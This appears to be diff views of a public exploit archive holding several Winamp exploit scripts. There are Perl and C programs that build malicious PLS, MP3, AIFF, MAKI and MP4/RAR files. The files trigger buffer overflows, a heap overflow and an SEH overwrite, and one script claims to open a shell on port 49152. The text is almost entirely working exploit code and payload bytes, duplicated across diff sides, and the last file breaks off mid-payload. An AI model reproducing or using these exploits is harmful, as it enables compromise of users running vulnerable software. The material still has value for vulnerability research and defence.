# ECX 41414141 <- Clear control over the register
# EDX 007EA478
# EBX 40000001
# ESP 028F1DB0
# EBP 77230459 USER32.SendMessageA
# ESI 08FD62A8 gen_msn.08FD62A8
# EDI 00497300 UNICODE "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
# EIP 08FD293C gen_msn.08FD293C
#
# Peace out.
# _________ ___ ________
# / _____/| | __\______ \
# \_____ \ | |/ / | | \
# / \| < | ` \
# /_______ /|__|_ \/_______ /
# \/ \/ \/
use strict;
use warnings;
my $overflow = "\x41" x 2048;
open(my $pls_playlist, "> poc.pls");
print $pls_playlist "[playlist]\r\n".
"NumberOfEntries=1\r\n".
"File1=http://".
$overflow.
"\r\n";
close $pls_playlist;
# milw0rm.com [2009-01-07]

70
platforms/windows/dos/7742.txt
View file

@ -1,35 +1,35 @@
################################################################################################################################
#Winamp <= 5.541 multiples Denial of Services (MP3/AIFF)
#
# Winamp MP3 file parsing DoS ==>
#!/usr/bin/perl
use strict;
my $mp3 =
"\x49\x44\x33\x00\x00\x00\x00\x00\x09\x07\x54\x49\x54\x32\x00\x00\x00\x08\x00\x00\x00".
"\x50\x69\x73\x74\x65\x20\x35\x54\x50\x45\x31\x00\x00\x00\x05\x00\x00\x00\x41\x6e".
"\x69\x73\x54\x41\x4c\x42\x00\x00\x00\x0d\x00\x00\x00\x62\x6c\x61\x62\x6c\x61\x20".
"\x44\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
my $mp32 =
"\x20" x 1500;
open(out, "> test.mp3");
binmode(out);
print (out $mp3, $mp32);
close(out);
#### Winamp AIFF file parsing header heap overflow :
#!/usr/bin/perl
use strict;
my $aiff =
"\x46\x4f\x52\x4d\x00\x04\xcd\xec\x41\x49\x46\x46\x43\x4f\x4d\x4d\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x20\x5e\x01\x18\x0f\x3c\x0e\xe4".
"\x00";
open(out, "> test.aiff");
binmode(out);
print (out $aiff);
close(out);
# milw0rm.com [2009-01-12]
################################################################################################################################
#Winamp <= 5.541 multiples Denial of Services (MP3/AIFF)
#
# Winamp MP3 file parsing DoS ==>
#!/usr/bin/perl
use strict;
my $mp3 =
"\x49\x44\x33\x00\x00\x00\x00\x00\x09\x07\x54\x49\x54\x32\x00\x00\x00\x08\x00\x00\x00".
"\x50\x69\x73\x74\x65\x20\x35\x54\x50\x45\x31\x00\x00\x00\x05\x00\x00\x00\x41\x6e".
"\x69\x73\x54\x41\x4c\x42\x00\x00\x00\x0d\x00\x00\x00\x62\x6c\x61\x62\x6c\x61\x20".
"\x44\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
my $mp32 =
"\x20" x 1500;
open(out, "> test.mp3");
binmode(out);
print (out $mp3, $mp32);
close(out);
#### Winamp AIFF file parsing header heap overflow :
#!/usr/bin/perl
use strict;
my $aiff =
"\x46\x4f\x52\x4d\x00\x04\xcd\xec\x41\x49\x46\x46\x43\x4f\x4d\x4d\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x20\x5e\x01\x18\x0f\x3c\x0e\xe4".
"\x00";
open(out, "> test.aiff");
binmode(out);
print (out $aiff);
close(out);
# milw0rm.com [2009-01-12]

374
platforms/windows/dos/8767.c
View file

@ -1,187 +1,187 @@
/*
Winamp 5.551 MAKI Parsing Integer Overflow Vulnerability
This is just a simple poc code to show how to
exploit the recent MAKI file parsing vulnerability.
Tested on :Vista sp1 and Xpsp3
Release Date :May 22 2009
Venders web site :http://www.winamp.com/
Version Teasted:Winamp 5.551
Not vulnerable :Winamp 5.552
Im not going into any real detail as this is just
a poc code and i think the guy who wrote the article
explains where and why the integer overflow happens.
Im sure if you are that interested have a look through
the dll your self and you will also see the vulnerable memove :).
Credits to the guys down at vrt-sourcefire for the overflow.
http://vrt-sourcefire.blogspot.com
We are able to overwrite the exception handlers and gain full
control of the application the vendors released a patch for this
but older versions are still vulnerable.!!!!
Below is and explanation of the overflow which i took
from the web site from the url above.
[--Snip--]
.text:12094DAB var_10144= byte ptr -10144h
.text:12094DAB MultiByteStr= byte ptr -13ch
If a string size is greater than or equal to 0x8000, edi will be 0xFFFFhhhh
(where, 0xhhhh is the two byte input)
.text:12094F62 loc_12094F62:
.text:12094F62 mov ax, [ebx]
.text:12094F65 movsx edi, ax ; sign extension
.text:12094F68 inc ebx
.text:12094F69 push edi ; Size
.text:12094F6A inc ebx
.text:12094F6B lea eax, [ebp+MultiByteStr]
.text:12094F71 push ebx ; Src
.text:12094F72 push eax ; Dst, buffer is located in the stack
.text:12094F73 call memmove
.text:120951E5 loc_120951E5:
.text:120951E5 mov edi, [ebx]
.text:120951E7 add ebx, 4
.text:120951EA mov ax, [ebx]
.text:120951ED movsx esi, ax ; sign extension
.text:120951F0 inc ebx
.text:120951F1 push esi ; Size
.text:120951F2 inc ebx
.text:120951F3 lea eax, [ebp+var_10144]
.text:120951F9 push ebx ; Src
.text:120951FA push eax ; Dst, buffer is located in the stack
.text:120951FB call memmove
[--Snip--]
And once the file is created then we need to place the
mcvcore.maki file inside ..//Winamp/Skins/Bento/Scripts/.
And then open winamp with olldbg.And step through the
execution.
Credits to n00b for writing simple poc code !!
Progression is always a good thing.
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
*/
#include <stdio.h>
#define MAKI "mcvcore.maki"
unsigned char First_Header[] =
{
0x46, 0x47, 0x03, 0x04, 0x17, 0x00, 0x00, 0x00, 0x2A, 0x00, 0x00, 0x00,
0x71, 0x49, 0x65, 0x51, 0x87, 0x0D, 0x51, 0x4A, 0x91, 0xE3, 0xA6, 0xB5,
0x32, 0x35, 0xF3, 0xE7, 0x64, 0x0F, 0xF5, 0xD6, 0xFA, 0x93, 0xB7, 0x49,
0x93, 0xF1, 0xBA, 0x66, 0xEF, 0xAE, 0x3E, 0x98, 0x7B, 0xC4, 0x0D, 0xE9,
0x0D, 0x84, 0xE7, 0x4A, 0xB0, 0x2C, 0x04, 0x0B, 0xD2, 0x75, 0xF7, 0xFC,
0xB5, 0x3A, 0x02, 0xB2, 0x4D, 0x43, 0xA1, 0x4B, 0xBE, 0xAE, 0x59, 0x63,
0x75, 0x03, 0xF3, 0xC6, 0x78, 0x57, 0xC6, 0x87, 0x43, 0xE7, 0xFE, 0x49,
0x85, 0xF9, 0x09, 0xCC, 0x53, 0x2A, 0xFD, 0x56, 0x65, 0x36, 0x60, 0x38,
0x1B, 0x46, 0xA7, 0x42, 0xAA, 0x75, 0xD8, 0x3F, 0x66, 0x67, 0xBF, 0x73,
0xF4, 0x7A, 0x78, 0xF4, 0xBB, 0xB2, 0xF7, 0x4E, 0x9C, 0xFB, 0xE7, 0x4B,
0xA9, 0xBE, 0xA8, 0x8D, 0x02, 0x0C, 0x37, 0x3A, 0xBF, 0x3C, 0x9F, 0x43,
0x84, 0xF1, 0x86, 0x88, 0x5B, 0xCF, 0x1E, 0x36, 0xB6, 0x5B, 0x0C, 0x5D,
0xE1, 0x7D, 0x1F, 0x4B, 0xA7, 0x0F, 0x8D, 0x16, 0x59, 0x94, 0x19, 0x41,
0x99, 0xE1, 0xE3, 0x4E, 0x36, 0xC6, 0xEC, 0x4B, 0x97, 0xCD, 0x78, 0xBC,
0x9C, 0x86, 0x28, 0xB0, 0xE5, 0x95, 0xBE, 0x45, 0x72, 0x20, 0x91, 0x41,
0x93, 0x5C, 0xBB, 0x5F, 0xF9, 0xF1, 0x17, 0xFD, 0x4E, 0x6D, 0x90, 0x60,
0x7E, 0x53, 0x2E, 0x48, 0xB0, 0x04, 0xCC, 0x94, 0x61, 0x88, 0x56, 0x72,
0xC0, 0xBC, 0x3A, 0x40, 0x22, 0x6F, 0xD6, 0x4B, 0x8B, 0xA4, 0x10, 0xC8,
0x29, 0x93, 0x25, 0x47, 0x4D, 0x3E, 0xAA, 0x97, 0xD0, 0xF4, 0xA8, 0x4F,
0x81, 0x7B, 0x0D, 0x0A, 0xF2, 0x2A, 0x45, 0x49, 0x83, 0xFA, 0xBB, 0xE4,
0x64, 0xF4, 0x81, 0xD9, 0x49, 0xB0, 0xC0, 0xA8, 0x5B, 0x2E, 0xC3, 0xBC,
0xFD, 0x3F, 0x5E, 0xB6, 0x62, 0x5E, 0x37, 0x8D, 0x40, 0x8D, 0xEA, 0x76,
0x81, 0x4A, 0xB9, 0x1B, 0x77, 0xBE, 0x97, 0x4F, 0xCE, 0xB0, 0x77, 0x19,
0x4E, 0x99, 0x56, 0xD4, 0x98, 0x33, 0xC9, 0x6C, 0x27, 0x0D, 0x20, 0xC2,
0xA8, 0xEB, 0x51, 0x2A, 0x4B, 0xBA, 0x7F, 0x5D, 0x4B, 0xC6, 0x5D, 0x4C,
0x71, 0x38, 0xBA, 0x1E, 0x8D, 0x9E, 0x48, 0x3E, 0x48, 0xB9, 0x60, 0x8D,
0x1F, 0x43, 0xC5, 0xC4, 0x05, 0x40, 0xC9, 0x08, 0x0F, 0x39, 0xAF, 0x23,
0x4B, 0x80, 0xF3, 0xB8, 0xC4, 0x8F, 0x7E, 0xBB, 0x59, 0x72, 0x86, 0xAA,
0xEF, 0x0E, 0x31, 0xFA, 0x41, 0xB7, 0xDC, 0x85, 0xA9, 0x52, 0x5B, 0xCB,
0x4B, 0x44, 0x32, 0xFD, 0x7D, 0x51, 0x37, 0x7C, 0x4E, 0xBF, 0x40, 0x82,
0xAE, 0x5F, 0x3A, 0xDC, 0x33, 0x15, 0xFA, 0xB9, 0x5A, 0x7D, 0x9A, 0x57,
0x45, 0xAB, 0xC8, 0x65, 0x57, 0xA6, 0xC6, 0x7C, 0xA9, 0xCD, 0xDD, 0x8E,
0x69, 0x1E, 0x8F, 0xEC, 0x4F, 0x9B, 0x12, 0xF9, 0x44, 0xF9, 0x09, 0xFF,
0x45, 0x27, 0xCD, 0x64, 0x6B, 0x26, 0x5A, 0x4B, 0x4C, 0x8C, 0x59, 0xE6,
0xA7, 0x0C, 0xF6, 0x49, 0x3A, 0xE4, 0x05, 0xCB, 0x6D, 0xC4, 0x8A, 0xC2,
0x48, 0xB1, 0x93, 0x49, 0xF0, 0x91, 0x0E, 0xF5, 0x4A, 0xFF, 0xCF, 0xDC,
0xB4, 0xFE, 0x81, 0xCC, 0x4B, 0x96, 0x1B, 0x72, 0x0F, 0xD5, 0xBE, 0x0F,
0xFF, 0xE1, 0x8C, 0xE2, 0x01, 0x59, 0xB0, 0xD5, 0x11, 0x97, 0x9F, 0xE4,
0xDE, 0x6F, 0x51, 0x76, 0x0D, 0x0A, 0xBD, 0xF8, 0xF0, 0x80, 0xA5, 0x1B,
0xA6, 0x42, 0xA0, 0x93, 0x32, 0x36, 0xA0, 0x0C, 0x8D, 0x4A, 0x1B, 0x34,
0x2E, 0x9B, 0x98, 0x6C, 0xFA, 0x40, 0x8B, 0x85, 0x0C, 0x1B, 0x6E, 0xE8,
0x94, 0x05, 0x71, 0x9B, 0xD5, 0x36, 0xFD, 0x03, 0xF8, 0x4A, 0x97, 0x95,
0x05, 0x02, 0xB7, 0xDB, 0x26, 0x7A, 0x10, 0xF2, 0xD5, 0x7F, 0xC4, 0xAC,
0xDF, 0x48, 0xA6, 0xA0, 0x54, 0x51, 0x57, 0x6C, 0xDC, 0x76, 0x35, 0xA5,
0xBA, 0xB5, 0xB3, 0x05, 0xCB, 0x4D, 0xAD, 0xC1, 0xE6, 0x18, 0xD2, 0x8F,
0x68, 0x96, 0xC1, 0xFE, 0x29, 0x61, 0xB7, 0xDA, 0x51, 0x4D, 0x91, 0x65,
0x01, 0xCA, 0x0C, 0x1B, 0x70, 0xDB, 0xF7, 0x14, 0x95, 0xD5, 0x36, 0xED,
0xE8, 0x45, 0x98, 0x0F, 0x3F, 0x4E, 0xA0, 0x52, 0x2C, 0xD9, 0x82, 0x4B,
0x3B, 0x9B, 0x7A, 0x66, 0x0E, 0x42, 0x8F, 0xFC, 0x79, 0x41, 0x15, 0x80,
0x9C, 0x02, 0x99, 0x31, 0xED, 0xC7, 0x19, 0x53, 0x98, 0x47, 0x98, 0x63,
0x60, 0xB1, 0x5A, 0x29, 0x8C, 0xAA, 0x4D, 0xC1, 0xBB, 0xE2, 0xF6, 0x84,
0x73, 0x41, 0xBD, 0xB3, 0xB2, 0xEB, 0x2F, 0x66, 0x55, 0x50, 0x94, 0x05,
0xC0, 0x73, 0x1F, 0x96, 0x1B, 0x40, 0x9B, 0x1B, 0x67, 0x24, 0x27, 0xAC,
0x41, 0x65, 0x22, 0xBA, 0x3D, 0x59, 0x77, 0xD0, 0x76, 0x49, 0xB9, 0x52,
0xF4, 0x71, 0x36, 0x55, 0x40, 0x0B, 0x82, 0x02, 0x03, 0xD4, 0xAB, 0x3A,
0x87, 0x4D, 0x87, 0x8D, 0x12, 0x32, 0x6F, 0xAD, 0xFC, 0xD5, 0x83, 0xC2,
0xDE, 0x24, 0x6E, 0xB7, 0x36, 0x4A, 0x8C, 0xCC, 0x9E, 0x24, 0xC4, 0x6B,
0x6C, 0x73, 0x37, 0x00
};
/*Trigger the overflow*/
unsigned char Exception [] =
{
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF
};
unsigned char Junk1 ='A';
int main()
{
FILE *fp;
int i;
if ((fp = fopen(MAKI, "wb")) == NULL)
{
printf("File %s write error\n", MAKI);
return(0);
}
for (i=0; i<sizeof(First_Header); i++)
fputc(First_Header[i], fp);
for (i=0; i<sizeof(Exception); i++)
fputc(Exception[i], fp);
for (i=0;i<16751;i++)
{
fwrite(&Junk1,1,1,fp);
}
fputs("\xEB\x06\x90\x90", fp);/*Pointer to next seh record */
fputs("\x42\x42\x42\x42", fp);/*SE handler*/
fclose(fp);
return 0;
}
// milw0rm.com [2009-05-22]
/*
Winamp 5.551 MAKI Parsing Integer Overflow Vulnerability
This is just a simple poc code to show how to
exploit the recent MAKI file parsing vulnerability.
Tested on :Vista sp1 and Xpsp3
Release Date :May 22 2009
Venders web site :http://www.winamp.com/
Version Teasted:Winamp 5.551
Not vulnerable :Winamp 5.552
Im not going into any real detail as this is just
a poc code and i think the guy who wrote the article
explains where and why the integer overflow happens.
Im sure if you are that interested have a look through
the dll your self and you will also see the vulnerable memove :).
Credits to the guys down at vrt-sourcefire for the overflow.
http://vrt-sourcefire.blogspot.com
We are able to overwrite the exception handlers and gain full
control of the application the vendors released a patch for this
but older versions are still vulnerable.!!!!
Below is and explanation of the overflow which i took
from the web site from the url above.
[--Snip--]
.text:12094DAB var_10144= byte ptr -10144h
.text:12094DAB MultiByteStr= byte ptr -13ch
If a string size is greater than or equal to 0x8000, edi will be 0xFFFFhhhh
(where, 0xhhhh is the two byte input)
.text:12094F62 loc_12094F62:
.text:12094F62 mov ax, [ebx]
.text:12094F65 movsx edi, ax ; sign extension
.text:12094F68 inc ebx
.text:12094F69 push edi ; Size
.text:12094F6A inc ebx
.text:12094F6B lea eax, [ebp+MultiByteStr]
.text:12094F71 push ebx ; Src
.text:12094F72 push eax ; Dst, buffer is located in the stack
.text:12094F73 call memmove
.text:120951E5 loc_120951E5:
.text:120951E5 mov edi, [ebx]
.text:120951E7 add ebx, 4
.text:120951EA mov ax, [ebx]
.text:120951ED movsx esi, ax ; sign extension
.text:120951F0 inc ebx
.text:120951F1 push esi ; Size
.text:120951F2 inc ebx
.text:120951F3 lea eax, [ebp+var_10144]
.text:120951F9 push ebx ; Src
.text:120951FA push eax ; Dst, buffer is located in the stack
.text:120951FB call memmove
[--Snip--]
And once the file is created then we need to place the
mcvcore.maki file inside ..//Winamp/Skins/Bento/Scripts/.
And then open winamp with olldbg.And step through the
execution.
Credits to n00b for writing simple poc code !!
Progression is always a good thing.
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
*/
#include <stdio.h>
#define MAKI "mcvcore.maki"
unsigned char First_Header[] =
{
0x46, 0x47, 0x03, 0x04, 0x17, 0x00, 0x00, 0x00, 0x2A, 0x00, 0x00, 0x00,
0x71, 0x49, 0x65, 0x51, 0x87, 0x0D, 0x51, 0x4A, 0x91, 0xE3, 0xA6, 0xB5,
0x32, 0x35, 0xF3, 0xE7, 0x64, 0x0F, 0xF5, 0xD6, 0xFA, 0x93, 0xB7, 0x49,
0x93, 0xF1, 0xBA, 0x66, 0xEF, 0xAE, 0x3E, 0x98, 0x7B, 0xC4, 0x0D, 0xE9,
0x0D, 0x84, 0xE7, 0x4A, 0xB0, 0x2C, 0x04, 0x0B, 0xD2, 0x75, 0xF7, 0xFC,
0xB5, 0x3A, 0x02, 0xB2, 0x4D, 0x43, 0xA1, 0x4B, 0xBE, 0xAE, 0x59, 0x63,
0x75, 0x03, 0xF3, 0xC6, 0x78, 0x57, 0xC6, 0x87, 0x43, 0xE7, 0xFE, 0x49,
0x85, 0xF9, 0x09, 0xCC, 0x53, 0x2A, 0xFD, 0x56, 0x65, 0x36, 0x60, 0x38,
0x1B, 0x46, 0xA7, 0x42, 0xAA, 0x75, 0xD8, 0x3F, 0x66, 0x67, 0xBF, 0x73,
0xF4, 0x7A, 0x78, 0xF4, 0xBB, 0xB2, 0xF7, 0x4E, 0x9C, 0xFB, 0xE7, 0x4B,
0xA9, 0xBE, 0xA8, 0x8D, 0x02, 0x0C, 0x37, 0x3A, 0xBF, 0x3C, 0x9F, 0x43,
0x84, 0xF1, 0x86, 0x88, 0x5B, 0xCF, 0x1E, 0x36, 0xB6, 0x5B, 0x0C, 0x5D,
0xE1, 0x7D, 0x1F, 0x4B, 0xA7, 0x0F, 0x8D, 0x16, 0x59, 0x94, 0x19, 0x41,
0x99, 0xE1, 0xE3, 0x4E, 0x36, 0xC6, 0xEC, 0x4B, 0x97, 0xCD, 0x78, 0xBC,
0x9C, 0x86, 0x28, 0xB0, 0xE5, 0x95, 0xBE, 0x45, 0x72, 0x20, 0x91, 0x41,
0x93, 0x5C, 0xBB, 0x5F, 0xF9, 0xF1, 0x17, 0xFD, 0x4E, 0x6D, 0x90, 0x60,
0x7E, 0x53, 0x2E, 0x48, 0xB0, 0x04, 0xCC, 0x94, 0x61, 0x88, 0x56, 0x72,
0xC0, 0xBC, 0x3A, 0x40, 0x22, 0x6F, 0xD6, 0x4B, 0x8B, 0xA4, 0x10, 0xC8,
0x29, 0x93, 0x25, 0x47, 0x4D, 0x3E, 0xAA, 0x97, 0xD0, 0xF4, 0xA8, 0x4F,
0x81, 0x7B, 0x0D, 0x0A, 0xF2, 0x2A, 0x45, 0x49, 0x83, 0xFA, 0xBB, 0xE4,
0x64, 0xF4, 0x81, 0xD9, 0x49, 0xB0, 0xC0, 0xA8, 0x5B, 0x2E, 0xC3, 0xBC,
0xFD, 0x3F, 0x5E, 0xB6, 0x62, 0x5E, 0x37, 0x8D, 0x40, 0x8D, 0xEA, 0x76,
0x81, 0x4A, 0xB9, 0x1B, 0x77, 0xBE, 0x97, 0x4F, 0xCE, 0xB0, 0x77, 0x19,
0x4E, 0x99, 0x56, 0xD4, 0x98, 0x33, 0xC9, 0x6C, 0x27, 0x0D, 0x20, 0xC2,
0xA8, 0xEB, 0x51, 0x2A, 0x4B, 0xBA, 0x7F, 0x5D, 0x4B, 0xC6, 0x5D, 0x4C,
0x71, 0x38, 0xBA, 0x1E, 0x8D, 0x9E, 0x48, 0x3E, 0x48, 0xB9, 0x60, 0x8D,
0x1F, 0x43, 0xC5, 0xC4, 0x05, 0x40, 0xC9, 0x08, 0x0F, 0x39, 0xAF, 0x23,
0x4B, 0x80, 0xF3, 0xB8, 0xC4, 0x8F, 0x7E, 0xBB, 0x59, 0x72, 0x86, 0xAA,
0xEF, 0x0E, 0x31, 0xFA, 0x41, 0xB7, 0xDC, 0x85, 0xA9, 0x52, 0x5B, 0xCB,
0x4B, 0x44, 0x32, 0xFD, 0x7D, 0x51, 0x37, 0x7C, 0x4E, 0xBF, 0x40, 0x82,
0xAE, 0x5F, 0x3A, 0xDC, 0x33, 0x15, 0xFA, 0xB9, 0x5A, 0x7D, 0x9A, 0x57,
0x45, 0xAB, 0xC8, 0x65, 0x57, 0xA6, 0xC6, 0x7C, 0xA9, 0xCD, 0xDD, 0x8E,
0x69, 0x1E, 0x8F, 0xEC, 0x4F, 0x9B, 0x12, 0xF9, 0x44, 0xF9, 0x09, 0xFF,
0x45, 0x27, 0xCD, 0x64, 0x6B, 0x26, 0x5A, 0x4B, 0x4C, 0x8C, 0x59, 0xE6,
0xA7, 0x0C, 0xF6, 0x49, 0x3A, 0xE4, 0x05, 0xCB, 0x6D, 0xC4, 0x8A, 0xC2,
0x48, 0xB1, 0x93, 0x49, 0xF0, 0x91, 0x0E, 0xF5, 0x4A, 0xFF, 0xCF, 0xDC,
0xB4, 0xFE, 0x81, 0xCC, 0x4B, 0x96, 0x1B, 0x72, 0x0F, 0xD5, 0xBE, 0x0F,
0xFF, 0xE1, 0x8C, 0xE2, 0x01, 0x59, 0xB0, 0xD5, 0x11, 0x97, 0x9F, 0xE4,
0xDE, 0x6F, 0x51, 0x76, 0x0D, 0x0A, 0xBD, 0xF8, 0xF0, 0x80, 0xA5, 0x1B,
0xA6, 0x42, 0xA0, 0x93, 0x32, 0x36, 0xA0, 0x0C, 0x8D, 0x4A, 0x1B, 0x34,
0x2E, 0x9B, 0x98, 0x6C, 0xFA, 0x40, 0x8B, 0x85, 0x0C, 0x1B, 0x6E, 0xE8,
0x94, 0x05, 0x71, 0x9B, 0xD5, 0x36, 0xFD, 0x03, 0xF8, 0x4A, 0x97, 0x95,
0x05, 0x02, 0xB7, 0xDB, 0x26, 0x7A, 0x10, 0xF2, 0xD5, 0x7F, 0xC4, 0xAC,
0xDF, 0x48, 0xA6, 0xA0, 0x54, 0x51, 0x57, 0x6C, 0xDC, 0x76, 0x35, 0xA5,
0xBA, 0xB5, 0xB3, 0x05, 0xCB, 0x4D, 0xAD, 0xC1, 0xE6, 0x18, 0xD2, 0x8F,
0x68, 0x96, 0xC1, 0xFE, 0x29, 0x61, 0xB7, 0xDA, 0x51, 0x4D, 0x91, 0x65,
0x01, 0xCA, 0x0C, 0x1B, 0x70, 0xDB, 0xF7, 0x14, 0x95, 0xD5, 0x36, 0xED,
0xE8, 0x45, 0x98, 0x0F, 0x3F, 0x4E, 0xA0, 0x52, 0x2C, 0xD9, 0x82, 0x4B,
0x3B, 0x9B, 0x7A, 0x66, 0x0E, 0x42, 0x8F, 0xFC, 0x79, 0x41, 0x15, 0x80,
0x9C, 0x02, 0x99, 0x31, 0xED, 0xC7, 0x19, 0x53, 0x98, 0x47, 0x98, 0x63,
0x60, 0xB1, 0x5A, 0x29, 0x8C, 0xAA, 0x4D, 0xC1, 0xBB, 0xE2, 0xF6, 0x84,
0x73, 0x41, 0xBD, 0xB3, 0xB2, 0xEB, 0x2F, 0x66, 0x55, 0x50, 0x94, 0x05,
0xC0, 0x73, 0x1F, 0x96, 0x1B, 0x40, 0x9B, 0x1B, 0x67, 0x24, 0x27, 0xAC,
0x41, 0x65, 0x22, 0xBA, 0x3D, 0x59, 0x77, 0xD0, 0x76, 0x49, 0xB9, 0x52,
0xF4, 0x71, 0x36, 0x55, 0x40, 0x0B, 0x82, 0x02, 0x03, 0xD4, 0xAB, 0x3A,
0x87, 0x4D, 0x87, 0x8D, 0x12, 0x32, 0x6F, 0xAD, 0xFC, 0xD5, 0x83, 0xC2,
0xDE, 0x24, 0x6E, 0xB7, 0x36, 0x4A, 0x8C, 0xCC, 0x9E, 0x24, 0xC4, 0x6B,
0x6C, 0x73, 0x37, 0x00
};
/*Trigger the overflow*/
unsigned char Exception [] =
{
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF
};
unsigned char Junk1 ='A';
int main()
{
FILE *fp;
int i;
if ((fp = fopen(MAKI, "wb")) == NULL)
{
printf("File %s write error\n", MAKI);
return(0);
}
for (i=0; i<sizeof(First_Header); i++)
fputc(First_Header[i], fp);
for (i=0; i<sizeof(Exception); i++)
fputc(Exception[i], fp);
for (i=0;i<16751;i++)
{
fwrite(&Junk1,1,1,fp);
}
fputs("\xEB\x06\x90\x90", fp);/*Pointer to next seh record */
fputs("\x42\x42\x42\x42", fp);/*SE handler*/
fclose(fp);
return 0;
}
// milw0rm.com [2009-05-22]

254
platforms/windows/local/4703.pl
View file

@ -1,127 +1,127 @@
#!/bin/perl
#
# Nullsoft Winamp MP4 tags Stack Overflow
#
# 0-day discovered and exploited by SYS 49152
#
# Tested on win XP SP2 ENG
# Tuned for Nullsoft Winamp 5.32 d.i.
# Shell on port 49152
#
# usage:
# well, not much fun for you kids here ..
# to get the shell you have to use ALT+3 and press UPDATE.
# Instead this one is VERY interesting for the exploiters around..
# this is an unicode sploit where in addition about half
# of the 0x0-0xff range can't be used..
# I'm quite curious to see if someone understands how I did..
# if this is the case drop me a mail with the magic word
# to gforce(put the @ here)operamail(put the . here)com
#
# btw
# due to some complaints by some kids that were having serious
# problems in using winzip, this time I tried with winrar :-)
#
#
#update:
#the latest 5.5 seems patched.
#the winamp version 5.32 reflects the date when I last updated
#this code, 'cause I exploited this one more than an year ago.
#I see that marsu exploited the same bug about six months ago,
#when I did the big mistake to show this one to some "friends"..
#I'm sure that marsu can even give the details on how this bug works :-)
# begin binary data:
my $rar_data = # code 724983
"\x52\x61\x72\x21\x1A\x07\x00\xCF\x90\x73\x00\x00\x0D\x00\x00".
"\x00\x00\x00\x00\x00\xBF\x95\x74\x20\x80\x3C\x00\x5A\x04\x00".
"\x00\x70\x09\x00\x00\x02\x0B\x7C\xFB\x08\xB3\xB0\x24\x36\x1D".
"\x33\x1C\x00\x20\x00\x00\x00\x53\x59\x53\x5F\x34\x39\x31\x35".
"\x32\x5F\x4D\x50\x34\x5F\x66\x6F\x72\x5F\x77\x69\x6E\x61\x6D".
"\x70\x2E\x6D\x70\x34\x0C\x1D\x51\x10\x8D\x0F\xCD\x81\x1C\x8A".
"\x25\xAE\x74\x6C\x6C\x18\xC6\xDE\x86\xF5\x9C\x64\xDD\x9B\xB3".
"\x66\xF3\x93\x84\xE7\x14\xE1\xBB\x3E\x0A\x4E\x31\x1A\xDE\xC8".
"\xC4\xD9\xAD\xA7\xA4\x73\xA8\x33\xE0\xD8\x33\xE4\xF1\x98\xF4".
"\x6D\x90\x0C\x03\x03\x00\xD0\x7B\x06\x31\x8F\xE2\x44\xB5\x4E".
"\x93\x94\xE1\x22\x51\x45\x03\x0C\xCC\x30\x18\x66\x7F\x0B\x16".
"\xE0\x0D\x83\xC1\xD8\x3E\x3B\xBB\x12\x93\xF8\x0D\xAC\xC5\x79".
"\x77\xEA\xAA\xF5\x7C\x78\x5E\x7F\x35\x74\xBD\x75\x5E\x55\xF1".
"\xF5\x2F\xDE\xF5\xDD\x5D\xDD\x25\x4A\xF8\xD2\xBE\x16\x92\x04".
"\x17\xDF\xB2\xAC\xDC\xDD\x0E\x6D\x06\x62\xAD\x0C\xAC\x93\x92".
"\x0F\xCE\xAF\xCB\xA1\xCB\xFD\x19\x08\x10\x7B\x25\xA0\xBA\x9E".
"\xC5\xEF\x6B\xF1\xE9\x70\xFF\x7C\xFE\x14\x16\x3B\x81\xB6\xFB".
"\xEC\xFB\xF2\x55\xA8\x07\xDF\xA5\x57\x80\xE7\x63\x1D\x63\xFD".
"\xCC\xCF\xB3\xA5\x59\x2A\x73\xD4\x67\x67\x66\x7A\x0E\x6F\xBD".
"\xB5\x39\x9E\x25\x60\xD8\x90\x6F\x0A\x85\x56\x55\xFE\x4A\x85".
"\x6A\x3D\x08\xAB\x6F\xF8\x67\xAB\x3A\xBF\x8B\xBB\xF3\x79\xD4".
"\x66\x77\xCE\xA3\xA9\xDB\x1B\x21\x50\x08\xF5\x3D\xCA\xF2\xEF".
"\x7D\x5D\xE4\xFD\x9E\xE7\x5F\xB5\xD8\x4F\xDD\xF9\xFE\x4F\x8F".
"\xEB\x4F\xD6\x4F\x56\x08\xC6\x0A\xBA\xB0\xBB\x75\xA1\xC8\x1D".
"\xCE\xE1\x32\x77\x29\x36\x5B\xFC\x04\x58\xCD\x8B\x68\xCC\xD9".
"\x51\x8D\x08\x41\xC2\xDF\x21\xE3\xFE\x47\xB2\x0D\x75\x2C\x7E".
"\x09\xA5\x78\xD6\x95\x10\x42\x38\x56\xD5\xD6\xDF\x9F\x3B\x74".
"\x8E\x2E\x32\xD8\x42\x25\xDB\x22\x75\x96\xDB\x41\x48\x6A\xFE".
